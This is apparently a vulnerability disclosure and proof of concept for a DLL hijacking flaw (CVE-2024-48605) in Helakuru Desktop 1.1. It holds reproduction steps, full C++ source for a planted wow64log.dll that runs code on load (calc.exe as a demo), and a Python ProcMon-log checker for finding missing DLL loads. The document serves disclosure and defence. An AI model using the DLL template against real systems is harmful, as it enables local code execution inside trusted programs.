POC details: 290bd1c52981777c7284eb32b1c9a88195c99378

Source
Related vulnerability
Title: Helakuru security vulnerability (CVE-2024-48605)
Description: Helakuru is an Android keyboard from the Sri Lankan company Helakuru. Helakuru v1.1 contains a security vulnerability caused by the lack of proper validation of the wow64log.dll file; a local attacker can execute arbitrary code.
Description
Helakuru Version 1.1 DLL Hijack - CVE-2024-48605
Introduction
**DLL Hijacking Vulnerability in Helakuru**
---

**Summary**

Helakuru Desktop version 1.1v is shipped for both 64-bit and 32-bit architectures. During testing, it was identified that the program attempts to load wow64log.dll, a library that is not present by default on modern Windows systems. Process Monitor therefore shows the load attempt ending in a 'Name not found' result, which exposes the program to a DLL hijacking vulnerability: if a file named wow64log.dll is placed in a directory on the loader's search path, it is loaded and its code runs inside the Helakuru process.

**Affected Version**

Helakuru Desktop 1.1v

**Steps to Reproduce**

1. Monitor DLL Loading with ProcMon
   * ProcMon shows the CreateFile operation with "Name not found" for wow64log.dll
   ![Pasted image 20240925232040](https://github.com/user-attachments/assets/e3f552d8-bb3c-4c61-87ef-8a1dd5fa9bf0)

2. Create a Malicious wow64log.dll
```cpp
#include <windows.h>
#include <stdio.h>

// Demonstration payload: start calc.exe so a successful load is visible.
void LaunchCalculator()
{
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    // CreateProcess takes a writable command-line buffer, so use a char array
    // instead of casting the const away from a string literal.
    char calcCmd[] = "C:\\Windows\\System32\\calc.exe";

    if (!CreateProcessA(
        NULL,           // lpApplicationName (taken from the command line)
        calcCmd,        // lpCommandLine
        NULL,           // lpProcessAttributes
        NULL,           // lpThreadAttributes
        FALSE,          // bInheritHandles
        0,              // dwCreationFlags
        NULL,           // lpEnvironment (inherit)
        NULL,           // lpCurrentDirectory (inherit)
        &si,
        &pi))
    {
        // GetLastError() returns a DWORD, so print it with %lu rather than %d.
        printf("CreateProcess failed (%lu).\n", GetLastError());
    }
    else
    {
        WaitForSingleObject(pi.hProcess, INFINITE);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    }
}

// Called by the loader when the DLL is mapped into the process.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        LaunchCalculator();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```

3. Run Helakuru Desktop
   * Launch Helakuru Desktop again. The planted wow64log.dll is now loaded by the program and Calculator starts, demonstrating that the hijacked DLL was executed.
   ![Pasted image 20240925233737](https://github.com/user-attachments/assets/d01f179e-e09d-45e1-8b04-2922102f7b69)

4. Verify DLL Load using ProcMon
   * Reopen ProcMon and observe that wow64log.dll is successfully loaded this time, confirming that the custom DLL has been executed by the program.
   ![Pasted image 20240925232728](https://github.com/user-attachments/assets/985f373f-9e7a-4d4b-b3d3-0bed98710be4)

**Impact**: A local attacker who can place a wow64log.dll on the loader's search path gains arbitrary code execution in the context of the Helakuru Desktop process.
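Step 1 above is normally done by eye in ProcMon. As an added example (not part of the original advisory or the Helakuru project), the Python function below automates that triage over a ProcMon CSV export so a developer or defender can audit a build for the same condition: it reports DLLs a process probed for but never found anywhere on its search path, which is exactly what makes wow64log.dll hijackable here. The CSV rows are constructed for this example and mimic the columns ProcMon writes.

```python
import csv
import io
from collections import defaultdict

# Constructed sample of a Process Monitor CSV export (File > Save, CSV format).
# Paths and PIDs are made up; the column layout matches what ProcMon writes.
SAMPLE_PROCMON_CSV = """\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"11:20:40.0001","Helakuru.exe","4120","CreateFile","C:\\Program Files\\Helakuru\\wow64log.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"11:20:40.0002","Helakuru.exe","4120","CreateFile","C:\\Windows\\System32\\wow64log.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"11:20:40.0003","Helakuru.exe","4120","CreateFile","C:\\Windows\\System32\\kernel32.dll","SUCCESS","Desired Access: Read Attributes"
"11:20:40.0004","Helakuru.exe","4120","CreateFile","C:\\Program Files\\Helakuru\\settings.ini","NAME NOT FOUND","Desired Access: Generic Read"
"11:20:41.0005","explorer.exe","1234","CreateFile","C:\\Windows\\System32\\example.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"""


def find_missing_dll_loads(csv_text, process_name=None):
    """Return {dll_name: [paths probed]} for DLLs that a process tried to
    open via CreateFile but that were NAME NOT FOUND at every location.

    A DLL that fails in one directory but is found in a later one is not
    reported: the loader resolved it, so there is nothing 'missing'.
    """
    probed = defaultdict(list)  # dll name -> every path the loader tried
    found = set()               # dll names that resolved somewhere
    for row in csv.DictReader(io.StringIO(csv_text)):
        if process_name and row["Process Name"].lower() != process_name.lower():
            continue
        if row["Operation"] != "CreateFile":
            continue
        path = row["Path"]
        name = path.rsplit("\\", 1)[-1].lower()
        if not name.endswith(".dll"):
            continue  # ignore config files and other non-library probes
        if row["Result"] == "NAME NOT FOUND":
            probed[name].append(path)
        elif row["Result"] == "SUCCESS":
            found.add(name)
    return {name: paths for name, paths in probed.items() if name not in found}
```

Any name in the result is a library the program wants but the system does not provide, so each listed path is a location where a planted file of that name would be picked up; the fix on the vendor side is to stop loading it or to load it only from a fully qualified, protected path.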


File snapshot

[4.0K] /data/pocs/290bd1c52981777c7284eb32b1c9a88195c99378
├── [1.0K] LICENSE
└── [2.5K] README.md

0 directories, 2 files